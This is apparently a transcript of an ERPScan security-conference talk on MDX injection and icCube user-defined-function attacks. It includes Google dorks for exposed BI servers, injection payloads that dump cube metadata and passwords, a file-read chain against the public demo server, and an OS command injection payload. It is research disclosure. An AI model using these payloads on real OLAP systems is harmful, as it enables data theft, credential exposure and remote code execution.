BI hacking – Breaking ICCube Dmitry Chastukhin – Director of SAP pentest /research team

Breaking SAP Portal

BI hacking Breaking ICCubeDmitry Chastukhin Director of SAP pentest/research team

Invest in securityto secure investmentsHi. My name is Dmitry Chastukhin, this is my colleague Alexander. We work in ERPScan Company . Today, we will tell you about OLAP and MDX technology, and how attacker can compromise the critical data using these technology. Dmitry chipik Chastuhin

Business application security expert

Yet another security researcher 2I work in the field of information security and, in particular, business application security. Whats more, I and my friends are the organizers of a hardcore security conference in Russia: ZeroNights.erpscan.comERPScan invest in security to secure investments3OLAP & Big DataLets talk about what is OLAP and Big Data.WTH is OLAP?Online analytical processing (OLAP) is an approach to formulate and answer multidimensional queries to large datasets.OLAP technologies developed by many software giants since the 199x.Business intelligence (BI) is a methodology that helps managers in the analysis of information inside and outside the company.OLAP is all about BI and Big Data.erpscan.comERPScan invest in security to secure investments4Online analytical processing (OLAP) is an approach to formulate and answer multidimensional queries to large datasets. And when I say large here, I mean really large datasets. OLAP technologies are developed by many software giants since the 199x. OLAP and Business Intelligence were initially developed to help top and middle level executives to analyze the information about processes and data inside and outside the company. OLAP is all about BI and Big Data.

Usage areaserpscan.comERPScan invest in security to secure investments5

After first appearing in the 200x, the use of Big Data technologies gradually expanded to several fields where analysis and decision making is based on large datasets. Now, the mot popular fields to use OLAP and Big Data are: Advertising, Healthcare, Energy, Government and Retail.Main players of OLAP industry

erpscan.comERPScan invest in security to secure investments6

On this slide you can see the main players of OLAP industry. Its Microsoft with Microsoft Analysis Services, SAP with SAP NetWeaver BW, SAS OLAP Server, IBM Cognos T1, open source icCube solution, Essbase and OLAP addon from Oracle and others.Google dorkMany of these servers can be accessed directly from the Web, here are some dorks:erpscan.comERPScan invest in security to secure investments7ServiceDorkPentaho Business Analytics XMLA interfaceinurl:/mondrian/testpage.jsp inurl:/pentaho/testpage.jspPentaho Business Analyticsintitle:"Pentaho User Console - Login"ISAPI MS Analysis Servicesinurl:msmdpump.dllSAP NetWeawerinurl:/sap/bc/bspOracle EssBaseintitle:"Hyperion System 9" inurl:aspA Quick GlanceAnd here they are:erpscan.comERPScan invest in security to secure investments8

A quick glance

erpscan.comERPScan invest in security to secure investments9Basic entitiesSimple tableDateCountryCityCustomerSupplierProductTotalsRouteWhat if we need to get totals by countries and suppliers vs. cities? Can we really do it in 2D?erpscan.comERPScan invest in security to secure investments10?So, why OLAP? Imagine that you have a large dataset about the supply of goods, structured in a simple table, as shown on the slide. What if the companys manager needs to get consolidated data about supplies ranged by country, city and supplier? Can it really be imagined in 2D, which is usually used in OLTP? What will happen if we also need the information requested above vs. customers or routes? So what?Were in N dimensions!


Ok, we now in 4 (or more dimensions). Welcome to the OLAP and MDX world. Looks crazy, eh?Cube will help!

And now the cube idea will help. The data is presented as a three-dimensional (or more, n-dimensional) structure. For example, this picture shows a cube which is created in accordance with the data from the previous slide. It is actually four-dimensional: I am sorry but I am not very good at drawing hypercubes. erpscan.comERPScan invest in security to secure investments13MDXLets talk about the language that allows us to make queries to such cubes.WTH is MDX?erpscan.comERPScan invest in security to secure investments14SQL isnt convenient to access Big Data.MDX (MultiDimension eXpressions) comes to replace it.

MDX looks like SQL, but its not SQL:(usually) you cant modify dataMDX is much stricter than SQL

What is MDX? OLAP stands far from OLTP, so using OLTP languages (such as SQL) isnt convenient for accessing Big Data. Moreover, SQL is a very hard language. So, MDX was created to replace SQL in this area. You might remember that SQL was not originally intended for programmers. MDX, too, was not created for programmers but rather for managers and analysts. Ironically, in the course of time, MDX became even more complex than SQL. At first look, MSX appears to be similar to SQL, but its wrong. There are (at least) two main differences between MDX and SQL: 1) MDX is much stricter than SQL and 2) usually you cant modify data. Ive said usually, because in some cases you can. But we will talk about it later.MDX query form[ WITH [ , ...n ] ] SELECT [ * | ( [ , ,...n ] ) ] FROM [ ][ ]erpscan.comERPScan invest in security to secure investments15This slide shows the standard layout of a SELECT query in MDX. Like in SQL, SELECT is used in MDX to retrieve a sample of data. It does look slightly like SQL, doesnt it? The query starts with the WITH section which can define measures, objects and members to be used in the rest of the query. After that, the SELECT section defines which dimensions of the cube will be used in the resulting sample. And finally, the FROM section defines which cube (or subcube created by a subquery) the data is to be retrieved from. It also defines filters and slicers. MDX SELECT query sampleWITHMEMBER SelectedMeasure AS ([Measures].[Salary Paid])SELECT { [SelectedMeasure] } ON COLUMNS, { ([Employee].[Department].[Department].[HQ Marketing], [Gender].[Gender].[M]) }ON ROWS FROM [HR] WHERE ([Store].[Store].AllMembers)

erpscan.comERPScan invest in security to secure investments16You can see a sample MDX query on this slide. This query will extract information about the paid salary (in the first dimension) against male employees from marketing department. Here, the new simple measure was defined in the WITH section. In practice, measures can be more complex and even include subqueries in some cases. The first dimension of results is defined by ON COLUMNS, and the second by ON ROWS. You can also use ON 1, ON 2, etc. The data is queried from the cube called HR, and the widest filter is selected All Members of Store.MDX Processingerpscan.comERPScan invest in security to secure investments17

Data

ApplicationmdXMLMDXData (SQL?)OLAPOLTP

Ok, weve written a MDX query? How it will be processed in Big Data systems? As it was mentioned earlier, in the most common case, OLAP is based on OLTP. When you write an MDX query and send it to the OLAP server, its picked up by MDX analyzer/interpreter. It converts the MDX query into mdXML query (we will talk about XML for analysis later) and sends it to OLTP. OLTP can process the query directly or convert it into the set of SQL (or noSQL) queries. The resulting data is gathered and sent back to the application. Many OLAP servers work in the way it is depicted on the slide.Attacks on MDXerpscan.comERPScan invest in security to secure investments18Now we know enough to plan how we can attack MDX. Imagine that we have a vulnerable application, that fails to filter user input and processes it directly into some parts of MDX query. What are the vectors? We can attack mdXML with good old XXE injections and other XML-attacks. We can use pure MDX injections to gather (or even modify!) sensitive data that was not supposed to be accessible by the vulnerable application. Also, we can use MDX extensions, user-defined functions, to expand the attack and even get RCE on the vulnerable system.erpscan.comERPScan invest in security to secure investments19MDX InjectionsLets talk about how to inject.What will help to inject?erpscan.comERPScan invest in security to secure investments20Commentaries:single line -- - (as in SQL)multiline /* */Special functions for dimensions and members crawling: Parent, FirstChild, LastChild, DefaultMember e.t.c.Subqueries in FROM ( )

What language features will help us in MDX injections? In MDX, like in SQL, there are two types of commentaries: single line (dashdash space dash) and multiline (slash asterisk). Also, we can use subqueries to create subcubes in the FROM part of the query. There are several built-in functions that work in many dialects of MDX, and with these functions we can crawl dimensions and reengineer cube structure, such as Parent, DefaultMember, FirstChild etc.Where to inject?WITHMEMBER SelectedMeasure AS ([Measures].[Salary Paid])SELECT { [SelectedMeasure]} ON COLUMNS, { ([Employee].[Department].[Department].[HQ Marketing], [Gender].[Gender].[M]) }ON ROWS FROM [HR] WHERE ([Store].[Store].AllMembers)erpscan.comERPScan invest in security to secure investments21hereherehereMDX injections arent the same as SQL injections. In SQL, we, in most cases, inject into the WHERE part of the query. In MDX, due to the language specifics, the application can insert user input into three different parts of query, as shown on the slide: into the members definition, into the dimension specification and into the WHERE filter or slicer.Types of injectionserpscan.comERPScan invest in security to secure investments22So, we have three possible types of MDX injections with possible results. If we are able to inject into the Pre-SELECT section, we can do almost everything (with the exception of data modification); if we can inject into the SELECT section, we can gain partial information about the cube metadata and gain access to unexpected and confidential data, and we can also access other cubes. In the WHERE section, you can only use blind MDX injections. And of course, you can call user defined functions in each of these sections.Pre-SELECT injectionWITHMEMBER SelectedMeasure AS ([Measures].[Salary Paid]MEMBER [Rank] AS (Rank([Employee].[Employee].currentmember, Head([Employee].[Employee].members, Dimensions.count-1)))MEMBER HierName AS ( Dimensions([Rank]).uniquename )SELECT{[Rank], [HierName]} on 0,{Head([Employee].[Employee].members, Dimensions.count-1)} on 1FROM [HR]/* [Salary Paid])SELECT { [SelectedMeasure]...rest of query...erpscan.comERPScan invest in security to secure investments23Here is an example of MDX injection into the Pre-SELECT section. The injection code is highlighted with red color, the commented rest of the query with green color. Here, we inject the code that will return almost all members of cube hierarchy. Were using special built-in keywords of MDX, such as Dimensions.count, uniquename, currentmember and members, which will allow us to access cube hierarchy metadata.In-SELECT injectionWITHMEMBER SelectedMeasure AS ([Measures].[Salary Paid])SELECT { [SelectedMeasure]} ON COLUMNS, { ([Employee].[Department].[Department].[HQ Marketing], [Gender].[Gender].AllMembers, [User name].[User name].AllMembers) }ON ROWSFROM [HR] WHERE ([Store].[Store].AllMembers) /* [M]) }... rest of request ...erpscan.comERPScan invest in security to secure investments24Another example describes the situation where we can only inject into the dimension specification in the SELECT part of the query. As you remember, in the original query, the application specified (for example, with combobox) the gender of an employee. If we can inject into query through the value of this hypothetical combobox, we can slightly modify the query, so it will return not only the employees salary, but also their system usernames or (possibly) password (if it remains in the cube). This is not a rare case: often, the cubes are created semi-automatically based on OLTP datasets, so passwords can still remain in OLAP data too.MDX Tips & Tricks (1)erpscan.comERPScan invest in security to secure investments25Lets talk a bit about some cool features of MDX that will help us in the process of injecting queries. First, as in many SQL dialects, you can start a multiline commentary with slash and asterisk and you dont need to end it; the rest of the code will stay corrected till the end of query text. Also, you can use {null} on one of axes/dimensions to get all data from other dimensions in query. For getting cube metadata, you can use the Dimensions keyword, and the DESCENDANTS keyword will give you all data about a member of the cube. Also, with LOOKUPCUBE you can access neighbor cubes (of course, if the OLAP MDX user can access them). And important string functions (such as StrToSet and SetToStr) will help you to encode and pass data within the query.Modifying data with MDXerpscan.comERPScan invest in security to secure investments26Normally, you cant modify data with MDX:MDX was created for data extraction, not modification.ALTER, CREATE and DROP are used for operations with measures and temporary sets, not for changing cube data.

But in rare cases, you can modify data with UPDATE statement.

MDX isnt SQL and normally you cant modify data with MDX. MDX statements like ALTER, CREATE and DROP are designed for creating/deleting/altering measures and temporary sets, but not for changing cube data. But in rare cases, you can modify data with UPDATE statement.MDX Update Queryerpscan.comERPScan invest in security to secure investments27Simple update query:

UPDATE CUBE [Sales] SET ([Geography].[Geo].[Europe], [Measures].[Amount]) = 20

So, if you can control all query AND data modification in cube is enabled, you can modify data in any cube, that you have permissions to access.

Here are the simplest UPDATE query, where Sales amount at Europe region is modified to 20. The worst thing in update is that it cant be subquery or cant start with WITH statement. So you can inject data modification statements only if two conditions is true: 1) you control ALL query and 2) data modification is enabled for your user.erpscan.comERPScan invest in security to secure investments28MDX UDFOkay, lets talk about another feature of MDX query language: User defined functions.User-Defined FunctionUser-Defined Function (UDF) these are functions written by the user or a third-party developer which can take and return values in the MDX syntax.ProgramID!FunctionName(Argument1, Argument2, ...)


User-Defined Function (UDF) these are functions written by the user or a third-party developer which can take and return values in the MDX syntax. So a developer can use them to enhance the functions of the language and the application which uses it. To call a UDF, this kind of construct must be used in a query:Attack on UDF. IcCube OLAP Server IcCube OLAP Server Popular OLAP Server Free. Has a Community edition Cross-platform Java app: Windows, Linux, Fast Has many utilities: IDE,web reports etcerpscan.comERPScan invest in security to secure investments30

We will now discuss some attacks on OLAP servers where User defined functions are used. IcCube OLAP Server will be the object of these attacks.Why? First, it is a quite popular solution for OLAP servers. Second, it has a free community edition. Third, this solution is cross-platform because it is written on Java. The developers claim it to be fast, reliable and secure. Another advantage of this software is that it is shipped with a lot of additional utilities for developing and debugging queries, creating web reports and so on.

IcCube OLAP Servererpscan.comERPScan invest in security to secure investments31

To sum up, the availability of this solution is why we have chosen it.


This is how working with an OLAP server looks for the end user. Fancy HTML5, diagrams and checkboxes allow working with multi-dimensional data conveniently and generating queries easily.IcCube OLAP Server Of course IcCube used MDX, but where?Send some request in WebReport, and look in Burperpscan.comERPScan invest in security to secure investments33

And this is how the client working with OLAP looks for anyone who looks into a sniffer. Of course, MDX is the appropriate language to be used in queries, but it is not the surprising part. Can you see the mdx parameter in the POST request? It contains the whole MDX query!

IcCube OLAP Server POST /icCube/gvi

action=executeMdx&mdx=SELECT { {[Measures].[Cashflow (M)],[Measures].[Cumulative Cashflow (M)]} } ON COLUMNS,{ [Calendar].[Calendar].[Quarter].allmembers } ON ROWS FROM ( SELECT { {[Product Type].[Product Type].[Product Type-L].&[Fixed Income I], [Product Type].[Product Type].[Product Type-L].&[Fixed Income II], [Product Type].[Product Type].[Product Type-L].&[Saving Account], [Product Type].[Product Type].[Product Type-L].&[Fixed Income Derivative I], [Product Type].[Product Type].[Product Type-L].&[Fixed Income Derivative II], [Product Type].[Product Type].[Product Type-L].&[Other]} } ON 0,{ {[Currency].[Currency].[Currency-L].&[121], [Currency].[Currency].[Currency-L].&[114], [Currency].[Currency].[Currency-L].&[119], [Currency].[Currency].[Currency-L].&[115], [Currency].[Currency].[Currency-L].&[133], [Currency].[Currency].[Currency-L].&[130], [Currency].[Currency].[Currency-L].&[122], [Currency].[Currency].[Currency-L].&[128], [Currency].[Currency].[Currency-L].&[124], [Currency].[Currency].[Currency-L].&[125], [Currency].[Currency].[Currency-L].&[123], [Currency].[Currency].[Currency-L].&[118], [Currency].[Currency].[Currency-L].&[126], [Currency].[Currency].[Currency-L].&[131], [Currency].[Currency].[Currency-L].&[116], [Currency].[Currency].[Currency-L].&[117], [Currency].[Currency].[Currency-L].&[132], [Currency].[Currency].[Currency-L].&[127], [Currency].[Currency].[Currency-L].&[120]} } ON 1,{ {[Interest/Principal].[Interest/Principal].[Interest/Principal-L].&[1], [Interest/Principal].[Interest/Principal].[Interest/Principal-L].&[2], [Interest/Principal].[Interest/Principal].[Interest/Principal-L].&[3]} } ON 2,{ {[Profit Unit].[Profit Unit].[Profit Unit-L1].&[-], [Profit Unit].[Profit Unit].[Profit Unit-L1].&[Corporate], [Profit Unit].[Profit Unit].[Profit Unit-L1].&[Debt], [Profit Unit].[Profit Unit].[Profit Unit-L1].&[Funding], [Profit Unit].[Profit Unit].[Profit Unit-L1].&[Investments], [Profit Unit].[Profit Unit].[Profit Unit-L1].&[Special Purpose]} } ON 3 FROM [Cube])&schema=Bank I&tqx=out:json

erpscan.comERPScan invest in security to secure investments34It means that the attacker need not bother with searching for injection parameters and bypassing filters. They just need to understand which cubes, measures, axes, members are there and compose the correct query. However, we are interested in user defined functions right now.IcCube OLAP ServerTry to use user defined functionsAs we remember icCube is a Java applicationLet's try JAVA functions

J!Math.PI


So an icCube is a Java application. Well then, maybe Java functions will serve as UDF?Lets try to call Math.PI using the common entry format: J!Math.PI


You can see the full entry on the slide as well as the result: the server has successfully replied with the value of Pi.

IcCube OLAP ServerProbably, we can call public static JAVA functions. Cool.J!System.getProperty("user.dir")


Rejoice! Looks like we can call public static Java functions. Lets try the obvious: system.GetProperty(). Aaaaand here is the part where we fail: an unknown method error. IcCube OLAP ServerIcCube developers restrict access from user defined functions to dangerous JAVA functionsFrom MDX, we can use some JAVA classes like Math and if you need JAVA classes from JAR that are not available with icCube, simply add them to the icCube-install/libdirectory (c) www.iccube.com


We tried a couple more cheesy functions and concluded that the developers had restricted access for MDX to all dangerous methods and functions and left just boring classes like Math. However, official documentation contains a subtle hint that much more that Math is possible if you add the desired classes to the server directory called lib. IcCube OLAP ServericCube-install/libdirectory containsa lot of interesting .jar files with interesting functions, which we can call

For example:org.apache.commons.io. FileUtils.readFileToString(FILE file)

from commons-io-1.4.jar


It was only logical to have a look at the JAR files which were already contained in the directory, decompile them and find something interesting. I can tell you outright that it was not hard to find.For example, commons-io-1.4.jar contained a method to read files from the OLAP server. UDF. IcCube OLAP Server Lets try to read file c:\111.txt from server, which contains text: hello_MDX For input, we can use error messages:

J!org.apache.commons.io.FileUtils.readFileToString(J!File("c:/111.txt")

Final MDX requestSELECT{StrToTuple(J!org.apache.commons.io.FileUtils.readFileToString(J!File("c:/111.txt")))} ON COLUMNS FROM [Sales]erpscan.comERPScan invest in security to secure investments40Okay, lets try to read a file called 111.txt which contains text: "hello_MDX". The text has to be displayed somewhere, so we will cause a wrong dimension name error. The slide shows the final file read query.

UDF. IcCube OLAP Servererpscan.comERPScan invest in security to secure investments41

This slide shows the result of our work. You can see that the server returned an error which contained the file content.

UDF. IcCube OLAP Server But if the file contains special charsets or even whitespaces, MDX parser wont return their content For example, if we try to read the file hello_MDX blabla, we will get this error: syntax error: unexpected statement 'blabla' (REGULAR_IDENTIFIER)erpscan.comERPScan invest in security to secure investments42But we did not manage to read anything interesting from the server. Special characters, commas and even spaces crashed the MDX parser and only part of the file was transferred from the server. For example, if we try to read the file hello_MDX blabla, we will get this error:UDF. IcCube OLAP Server Ok. Just encode the file content. Base64, for example We found a method :org.apache.commons.codec.binary.Base64.encodeBase64(byte[] binaryData) in the file commons-codec-1.6.jar tried it and got the error:

syntax error: unexpected statement 'EQ'erpscan.comERPScan invest in security to secure investments43The solution is obvious: encode the file content with base64. By the way, commons-codec-1.6.jar happens to have a relevant method. Add this method to the query, send it, and here is failure again: syntax error: unexpected statement 'EQ'.

UDF. IcCube OLAP Server Hmm, probably the Base64 string contained an EQ sequence, which means equivalent Ok, encoded the file content twice and got the error: syntax error: missing expression following '='


The Base64 string probably contained an EQ sequence, which means equivalent in MDX. Ok, encoded file content twice and got the error. The parser returned an error about a missed expression after the equal operator because this symbol is frequent in the end of base 64 strings.

UDF. IcCube OLAP Server oh, the = symbol is often found in the Base64 string to resolve this problem, just concatenate the Base64 string which contains = with one letterMTIzNDU=sWhen MDX parser works, it drops = and all symbols after that. But = is always at the end of Base64, we can still decode it.

erpscan.comERPScan invest in security to secure investments45To resolve this problem, just concatenate the Base64 string which contains = with one letter, and the expression will be correct. When MDX parser works, it drops = and all symbols after that. But we know the equal symbol is always at the end of Base64, if anywhere, so we can still decode it.

UDF. IcCube OLAP Server Final user-defined function call:

StrToTuple(J!org.apache.commons.codec.binary.Base64.encodeBase64(J!org.apache.commons.codec.binary.Base64.encodeBase64(J!org.apache.commons.io.FileUtils.readFileToByteArray(J!File("c:/111.txt"))))+"s")

erpscan.comERPScan invest in security to secure investments46This is our final user-defined function call which allows reading any file from the OLAP server.

UDF. IcCube OLAP Server

Decode WVVkV2MySkhPV1pVVlZKWlNVZEtjMWxYU25OWlVUMDk= erpscan.comERPScan invest in security to secure investments47

The server replies with an error which contains a base64 string. We must not forget to add an equal sign at the end

UDF. IcCube OLAP Server We must not forget to add = at the end of the Base64 string because the MDX parser has trimmed them After decoding, we got the text from the file c:\111.txt erpscan.comERPScan invest in security to secure investments48

decode the string several times and get the contents of the file at the OLAP server.

UDF. IcCube OLAP Server This vulnerability is very interesting, especially because users passwords in IcCube OLAP Server are stored as Base64 encoded strings in the file icCubeUsers.icc-users

administrator standard standard administrator erpscan.comERPScan invest in security to secure investments49

This vulnerability is very interesting, especially because user passwords in IcCube OLAP Server are stored as Base64 encoded strings in a configuration file. It is year 2013, and applications still store passwords in plaintext.

UDF. IcCube OLAP Server Example: getting user home directory from icCube demo server demo3.iccube.com

POST /icCube/gvi HTTP/1.1 Host: demo3.iccube.com action=executeMdx&mdx=SELECT{StrToTuple(J!crazydev.common.security.Base64Encoder.encodeString(J!crazydev.common.utils.CdSystemUtils.getStringProperty("user.home","aaa"))%2b"ss")}+ON+COLUMNS,{[Calendar].[Calendar].allmembers+}+ON+ROWS+FROM+[Cube]&schema=Bank+I&tqx=out%3Ajson

erpscan.comERPScan invest in security to secure investments50Just before BlackHat icCube shut down those methods but the mechanism of calling those functions is flawed by nature and can be successfully exploited with the help of other critical methods. For example, lets try retrieving the user home directory where the official icCube demo server is launched from. We will use the methods crazydev.common.utils.CdSystemUtils.getStringProperty() and crazydev.common.security.Base64Encoder.encodeString()which still work.

UDF. IcCube OLAP Server HTTP/1.1 200 OK {version:'0.6',status:'error',errors:[{reason:'other',message:'\u0027\u0027L2hvbWUvZGVtbzM\u0027 is neither a dimension nor a hierarchy within the cube.\u0027 is neither a dimension nor a hierarchy within the cube.',detailed_message:'SELECT{StrToTuple(J!crazydev.common.security.Base64Encoder.encodeString(J!crazydev.common.utils.CdSystemUtils.getStringProperty(\u0022user.home\u0022,\u0022aaa\u0022))+\u0022ss\u0022)} ON COLUMNS,\r\n{[Calendar].[Calendar].allmembers } ON ROWS\r\n FROM [Cube]\r\n',error_code:'OLAP_UNKNOWN_DIMENSION_HIERARCHY'}]}

After decoding L2hvbWUvZGVtbzM=, we get /home/demo3

erpscan.comERPScan invest in security to secure investments51Again, the same error with a base64 string. After decoding it, we get the necessary information:"/home/demo3"

UDF. IcCube OLAP Servererpscan.comERPScan invest in security to secure investments52DEMONow, a small demoUDF. IcCube OLAP Server But, dangerous JAVA methods are only half of the problem Dangerous JAVA methods with bugs are another thing which the attacker can use Method org.apache.commons.io.FileSystemUtils.freeSpaceWindows(String path)from commons-io-1.4.jar


But this is not the end of the adventures of user defined functions. Calling dangerous methods is only half of the problem; the other half is the methods which contain certain vulnerabilities themselves. An example: there is a method called freeSpaceWindows which returns information about the hard drive space occupied by a certain directory. But look how it is implemented!

UDF. IcCube OLAP Server variable path used as parameter in command cmd.exe /C dir/-c path variable path isnt checked, thats why an attacker can inject operation system commands

Thats the code of the user-defined function which executes calc.exe on the server OS

J!FileSystemUtils.freeSpace("& calc.exe")

erpscan.comERPScan invest in security to secure investments54OS command injection is self-evident here, because the path parameter is not checked in any way but rather just concatenated to the dir operator. The code for calling calculator is quite simple and elegant: J!FileSystemUtils.freeSpace("& calc.exe")

UDF. IcCube OLAP Servererpscan.comERPScan invest in security to secure investments55DEMOLet me show you how it works

Conclusion MDX is a very popular language At this moment, we dont have an alternative language for multidimensional data requests All developers forget about MDX security. Back to 2000 Security issues in MDX may cause a lot of attacks: data stealing, file reading, privilege escalation, remote code execution, SQL injection, cross site scripting, etc.

erpscan.comERPScan invest in security to secure investments56To sum up: MDX is a very popular language in business intelligence, and it is the main query language which is used to retrieve data from infocubes and OLAP servers as a whole. It does not have a decent alternative now. MDX resembles SQL a lot but there are a lot of differences, both in semantics and in syntax.Moreover, the developers of business intelligence applications have forgotten about security for some reason: they send along all data sample queries without any filtering. Vulnerabilities and errors in MDX query processing can lead to dire consequences like: data stealing, file reading, privilege escalation, arbitrary server-side code execution, various SQL and JavaScript code injections.

Web: www.erpscan.come-mail: [email protected] Twitter: @erpscan@_chipik@dark_k3y

BI hacking – Breaking ICCube Dmitry Chastukhin – Director of SAP pentest /research team

Documents

Transcript of BI hacking – Breaking ICCube Dmitry Chastukhin – Director of SAP pentest /research team